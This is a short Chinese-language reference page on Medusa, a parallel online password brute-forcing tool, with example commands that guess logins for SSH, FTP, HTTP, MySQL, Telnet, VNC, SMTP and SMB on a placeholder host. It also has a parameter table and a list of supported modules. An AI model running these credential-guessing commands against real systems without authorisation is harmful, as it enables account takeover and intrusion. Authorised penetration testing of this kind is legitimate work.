---
title: "Medusa"
weight: 40
description: "快速并行在线密码爆破工具"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Medusa

Medusa 是一款快速、并行、模块化的在线密码爆破工具，设计用于安全测试和渗透测试。

## 基础使用

### SSH 爆破
```bash
medusa -h target.com -u admin -P wordlist.txt -M ssh
```

### FTP 爆破
```bash
medusa -h target.com -U users.txt -P wordlist.txt -M ftp
```

### HTTP 爆破
```bash
medusa -h target.com -u admin -P wordlist.txt -M http -m DIR:/admin
```

### MySQL 爆破
```bash
medusa -h target.com -u root -P wordlist.txt -M mysql
```

## 常用参数

| 参数 | 描述 |
|------|------|
| -h | 目标主机 |
| -u | 用户名 |
| -U | 用户名字典 |
| -p | 密码 |
| -P | 密码字典 |
| -M | 模块名称 |
| -t | 并发线程数 |
| -n | 端口号 |
| -v | 详细级别 |

## 支持的模块

- **文件传输** - FTP、SFTP、TFTP
- **远程访问** - SSH、Telnet、RDP、VNC
- **Web** - HTTP、HTTPS
- **数据库** - MySQL、PostgreSQL、MSSQL、Oracle
- **邮件** - SMTP、POP3、IMAP、Exchange
- **其他** - LDAP、SMB、SNMP、Mikrotik

## 功能特性

- **模块化设计** - 易于添加新模块
- **并行处理** - 多线程爆破
- **用户友好** - 简单的命令行界面
- **跨平台** - Windows、Linux、macOS

## 使用示例

```bash
# Telnet 爆破
medusa -h target.com -u admin -P wordlist.txt -M telnet

# VNC 爆破
medusa -h target.com -P wordlist.txt -M vnc

# SMTP 爆破
medusa -h smtp.target.com -U users.txt -P wordlist.txt -M smtp

# SMB 爆破
medusa -h target.com -u administrator -P wordlist.txt -M smbnt
```

## 参考资源

- [Medusa GitHub](https://github.com/jmk-foofus/medusa)